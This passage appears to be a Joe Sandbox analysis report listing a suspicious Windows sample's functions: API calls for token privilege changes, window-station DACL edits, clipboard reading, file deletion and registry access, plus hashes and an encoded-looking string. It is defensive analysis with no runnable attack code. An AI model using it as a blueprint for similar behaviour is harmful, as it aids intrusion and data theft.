                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 4125248594-2988720461
                                            • Opcode ID: e039ccd5bb9e23fe03571cce1a0473d9c5cb3e02e7f75d3fc2c71a246f5a7955
                                            • Instruction ID: e4944bda1db1ad38caedbbc62b791117e8f898e1cffd3d199cbe62e679ceaed7
                                            • Opcode Fuzzy Hash: e039ccd5bb9e23fe03571cce1a0473d9c5cb3e02e7f75d3fc2c71a246f5a7955
                                            • Instruction Fuzzy Hash: D8318871A4031C7BEB206B659C4AF7F7F6CFB44B64F104016FA05EA1D1D6B19D01ABA1
                                            Function 0083ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                              • Part of subcall function 0083B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                              • Part of subcall function 0083B134: GetLastError.KERNEL32 ref: 0083B1BA
                                            • _memset.LIBCMT ref: 0083AD08
                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0083AD5A
                                            • CloseHandle.KERNEL32(?), ref: 0083AD6B
                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0083AD82
                                            • GetProcessWindowStation.USER32 ref: 0083AD9B
                                            • SetProcessWindowStation.USER32(00000000), ref: 0083ADA5
                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0083ADBF
                                              • Part of subcall function 0083AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0083ACC0), ref: 0083AB99
                                              • Part of subcall function 0083AB84: CloseHandle.KERNEL32(?,?,0083ACC0), ref: 0083ABAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                            • String ID: $default$winsta0
                                            • API String ID: 2063423040-1027155976
                                            • Opcode ID: 26a4a77f2b61059ea53374ca44103af42052a58042f43d2060b08d2da42194d6
                                            • Instruction ID: eb93b825b7e2c5544a4835dda69573357d1ed910b3964e2b901f4bdc2e373d16
                                            • Opcode Fuzzy Hash: 26a4a77f2b61059ea53374ca44103af42052a58042f43d2060b08d2da42194d6
                                            • Instruction Fuzzy Hash: 3D818CB1800249AFDF15DFA8DC49AEEBB79FF44304F044119F964E21A1EB358E54DBA2
                                            Function 008460DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00845FA6,?), ref: 00846EF1
                                              • Part of subcall function 0084725E: __wsplitpath.LIBCMT ref: 0084727B
                                              • Part of subcall function 0084725E: __wsplitpath.LIBCMT ref: 0084728E
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • _wcscat.LIBCMT ref: 00846149
                                            • _wcscat.LIBCMT ref: 00846167
                                            • __wsplitpath.LIBCMT ref: 0084618E
                                            • FindFirstFileW.KERNEL32(?,?), ref: 008461A4
                                            • _wcscpy.LIBCMT ref: 00846209
                                            • _wcscat.LIBCMT ref: 0084621C
                                            • _wcscat.LIBCMT ref: 0084622F
                                            • lstrcmpiW.KERNEL32(?,?), ref: 0084625D
                                            • DeleteFileW.KERNEL32(?), ref: 0084626E
                                            • MoveFileW.KERNEL32(?,?), ref: 00846289
                                            • MoveFileW.KERNEL32(?,?), ref: 00846298
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 008462AD
                                            • DeleteFileW.KERNEL32(?), ref: 008462BE
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008462E1
                                            • FindClose.KERNEL32(00000000), ref: 008462FD
                                            • FindClose.KERNEL32(00000000), ref: 0084630B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                            • String ID: \*.*$p1Wu`KXu
                                            • API String ID: 1917200108-2866000061
                                            • Opcode ID: c1054b8fa9595253e297f850ce9b4049f5bb015fb2911ce9909a42d2addd27d6
                                            • Instruction ID: 35509d3906ea8aad295c6e9fd7a1d4cc1c7dbd0eb11aacc28746bfc4fb0a089e
                                            • Opcode Fuzzy Hash: c1054b8fa9595253e297f850ce9b4049f5bb015fb2911ce9909a42d2addd27d6
                                            • Instruction Fuzzy Hash: F55100B280822C6ACB21EB95DC44DDBB7BCFF05310F0501E6E545E2141EF7697898FA6
                                            Function 00856B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenClipboard.USER32(0089DC00), ref: 00856B36
                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00856B44
                                            • GetClipboardData.USER32(0000000D), ref: 00856B4C
                                            • CloseClipboard.USER32 ref: 00856B58
                                            • GlobalLock.KERNEL32(00000000), ref: 00856B74
                                            • CloseClipboard.USER32 ref: 00856B7E
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00856B93
                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00856BA0
                                            • GetClipboardData.USER32(00000001), ref: 00856BA8
                                            • GlobalLock.KERNEL32(00000000), ref: 00856BB5
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00856BE9
                                            • CloseClipboard.USER32 ref: 00856CF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                            • String ID:
                                            • API String ID: 3222323430-0
                                            • Opcode ID: a630b721f3d77163be71bac6ec2efc8c218830760ad7ca4fe9f0678f184efc83
                                            • Instruction ID: e7b7f3928722fb1b96f3751907ae4d77b50290280764d1a51637b063066abb68
                                            • Opcode Fuzzy Hash: a630b721f3d77163be71bac6ec2efc8c218830760ad7ca4fe9f0678f184efc83
                                            • Instruction Fuzzy Hash: 2A518E71200305ABD310EF68DD96F6E77A8FF94B22F400129F956D71D1EF60E8098B62
                                            Function 0084F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084F62B
                                            • FindClose.KERNEL32(00000000), ref: 0084F67F
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084F6A4
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0084F6BB
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0084F6E2
                                            • __swprintf.LIBCMT ref: 0084F72E
                                            • __swprintf.LIBCMT ref: 0084F767
                                            • __swprintf.LIBCMT ref: 0084F7BB
                                              • Part of subcall function 0082172B: __woutput_l.LIBCMT ref: 00821784
                                            • __swprintf.LIBCMT ref: 0084F809
                                            • __swprintf.LIBCMT ref: 0084F858
                                            • __swprintf.LIBCMT ref: 0084F8A7
                                            • __swprintf.LIBCMT ref: 0084F8F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                            • API String ID: 835046349-2428617273
                                            • Opcode ID: 86c43eb4a9d0dfbd138682996df34ab4140f7cd03095ba87677d30dad5eb7fde
                                            • Instruction ID: e94230167903362bf76487d2b0a1d63a1d96f0190d2610db945082e1ce41770e
                                            • Opcode Fuzzy Hash: 86c43eb4a9d0dfbd138682996df34ab4140f7cd03095ba87677d30dad5eb7fde
                                            • Instruction Fuzzy Hash: A7A1FDB2404344ABC750EBA8CC95DAFB7ECFF98704F44492EB595C2192EB34D949CB62
                                            Function 00851B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00851B50
                                            • _wcscmp.LIBCMT ref: 00851B65
                                            • _wcscmp.LIBCMT ref: 00851B7C
                                            • GetFileAttributesW.KERNEL32(?), ref: 00851B8E
                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00851BA8
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00851BC0
                                            • FindClose.KERNEL32(00000000), ref: 00851BCB
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00851BE7
                                            • _wcscmp.LIBCMT ref: 00851C0E
                                            • _wcscmp.LIBCMT ref: 00851C25
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00851C37
                                            • SetCurrentDirectoryW.KERNEL32(008B39FC), ref: 00851C55
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00851C5F
                                            • FindClose.KERNEL32(00000000), ref: 00851C6C
                                            • FindClose.KERNEL32(00000000), ref: 00851C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                            • String ID: *.*
                                            • API String ID: 1803514871-438819550
                                            • Opcode ID: ae1a6b1d8c2b227d874deae13170c8eb02c60b4c1be64b9f1aa249973104c383
                                            • Instruction ID: f9f7f1f4472edd8a305599cd32fcba02d30ca12bd3d63aaf2e64ad9b38e12096
                                            • Opcode Fuzzy Hash: ae1a6b1d8c2b227d874deae13170c8eb02c60b4c1be64b9f1aa249973104c383
                                            • Instruction Fuzzy Hash: D03180326403196BDF10ABA8AC8DBDE77ACFF45321F104195EC11E2190EB75DE898B64
                                            Function 00851C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00851CAB
                                            • _wcscmp.LIBCMT ref: 00851CC0
                                            • _wcscmp.LIBCMT ref: 00851CD7
                                              • Part of subcall function 00846BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00846BEF
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00851D06
                                            • FindClose.KERNEL32(00000000), ref: 00851D11
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00851D2D
                                            • _wcscmp.LIBCMT ref: 00851D54
                                            • _wcscmp.LIBCMT ref: 00851D6B
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00851D7D
                                            • SetCurrentDirectoryW.KERNEL32(008B39FC), ref: 00851D9B
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00851DA5
                                            • FindClose.KERNEL32(00000000), ref: 00851DB2
                                            • FindClose.KERNEL32(00000000), ref: 00851DC2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                            • String ID: *.*
                                            • API String ID: 1824444939-438819550
                                            • Opcode ID: 97ce8e58bd69c3d0e51b7414912ba85d3bd1033101a8b34db71ed07f57cc69e2
                                            • Instruction ID: 39397ae77a46dce7162fb74582449fe4368f2fbf531f9ed3465888815745945e
                                            • Opcode Fuzzy Hash: 97ce8e58bd69c3d0e51b7414912ba85d3bd1033101a8b34db71ed07f57cc69e2
                                            • Instruction Fuzzy Hash: 7731D23650061A6ACF10ABA8EC4DBEE77BDFF45325F140591EC11E21D0DB74DE898B64
                                            Function 00807D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset
                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                            • API String ID: 2102423945-2023335898
                                            • Opcode ID: 9782d93247f61e28fedc4ad295fec00dff6b99aee414e253f21c248669ba9f26
                                            • Instruction ID: 6da8cd962f1f119d345738ced013f761162c314ae144ce43f1b7fc54cfd4adc5
                                            • Opcode Fuzzy Hash: 9782d93247f61e28fedc4ad295fec00dff6b99aee414e253f21c248669ba9f26
                                            • Instruction Fuzzy Hash: DC82BF71D04219CBCB64CF98C8807ADBBB1FF48324F258169D959EB396E734AD85CB90
                                            Function 0085091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 008509DF
                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008509EF
                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008509FB
                                            • __wsplitpath.LIBCMT ref: 00850A59
                                            • _wcscat.LIBCMT ref: 00850A71
                                            • _wcscat.LIBCMT ref: 00850A83
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00850A98
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850AAC
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850ADE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00850AFF
                                            • _wcscpy.LIBCMT ref: 00850B0B
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00850B4A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                            • String ID: *.*
                                            • API String ID: 3566783562-438819550
                                            • Opcode ID: 37224bedf6cbc4ffb8e67c85b89ea0e6f8d75328e2609de4cb5f7193e2087a88
                                            • Instruction ID: f84c29a73c11edd62662972b84ddd6ecbb10432b7a42e88ea5631bf423e5acad
                                            • Opcode Fuzzy Hash: 37224bedf6cbc4ffb8e67c85b89ea0e6f8d75328e2609de4cb5f7193e2087a88
                                            • Instruction Fuzzy Hash: 49616A725043059FDB10EF64C88599EB3E9FF89324F04891AF989C7252EB31E949CF92
                                            Function 0083A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                              • Part of subcall function 0083ABBB: GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                              • Part of subcall function 0083ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                              • Part of subcall function 0083ABBB: HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                              • Part of subcall function 0083AC56: GetProcessHeap.KERNEL32(00000008,0083A6B5,00000000,00000000,?,0083A6B5,?), ref: 0083AC62
                                              • Part of subcall function 0083AC56: HeapAlloc.KERNEL32(00000000,?,0083A6B5,?), ref: 0083AC69
                                              • Part of subcall function 0083AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0083A6B5,?), ref: 0083AC7A
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0083A6D0
                                            • _memset.LIBCMT ref: 0083A6E5
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0083A704
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A715
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0083A752
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0083A76E
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A78B
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0083A79A
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083A7A1
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0083A7C2
                                            • CopySid.ADVAPI32(00000000), ref: 0083A7C9
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0083A7FA
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0083A820
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0083A834
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 8194d5f2f06750c893e5558aeba2ab4159a7789b4c7f21ebef2b48f332d9dec1
                                            • Instruction ID: 5f2e59d6fd98ea608933b854045f097ff8171b3d3ddf8184d118fd53a58eeb9f
                                            • Opcode Fuzzy Hash: 8194d5f2f06750c893e5558aeba2ab4159a7789b4c7f21ebef2b48f332d9dec1
                                            • Instruction Fuzzy Hash: BB515B71900209ABDF14DFA5DC85EEEBBB9FF44710F048129F951EB290DB359A06CBA1
                                            Function 00806F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 0-2773958091
                                            • Opcode ID: 65f034d5573f6280cb1c9ce0be97c715652625ae2a6a7ded29d840daa956a36a
                                            • Instruction ID: d72d30a1dc5241b4c68f4130ed25286270044c239ba0654dd60b34f4abc50305
                                            • Opcode Fuzzy Hash: 65f034d5573f6280cb1c9ce0be97c715652625ae2a6a7ded29d840daa956a36a
                                            • Instruction Fuzzy Hash: 9F727E71E04219DBDB64DF98C8807AEB7B5FF08714F14816AE905EB381EB709E81DB94
                                            Function 008463F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • _wcscat.LIBCMT ref: 00846441
                                            • __wsplitpath.LIBCMT ref: 0084645F
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00846474
                                            • _wcscpy.LIBCMT ref: 008464A3
                                            • _wcscat.LIBCMT ref: 008464B8
                                            • _wcscat.LIBCMT ref: 008464CA
                                            • DeleteFileW.KERNEL32(?), ref: 008464DA
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008464EB
                                            • FindClose.KERNEL32(00000000), ref: 00846506
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                            • String ID: \*.*$p1Wu`KXu
                                            • API String ID: 2643075503-2866000061
                                            • Opcode ID: ebc670ca73d155f306ea9f9d52faa0fdeea2cf5a256d213b81ac10d821941096
                                            • Instruction ID: c9b059c8c8a25274e415e96797c32e198bdfae2a27033bcff4802cf7638fffad
                                            • Opcode Fuzzy Hash: ebc670ca73d155f306ea9f9d52faa0fdeea2cf5a256d213b81ac10d821941096
                                            • Instruction Fuzzy Hash: 5F3164B24083889AC721EBA88889DDBB7DCFF56310F44092AF5D9C3142FB35D5498767
                                            Function 008631BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0086328E
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0086332D
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008633C5
                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00863604
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00863611
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
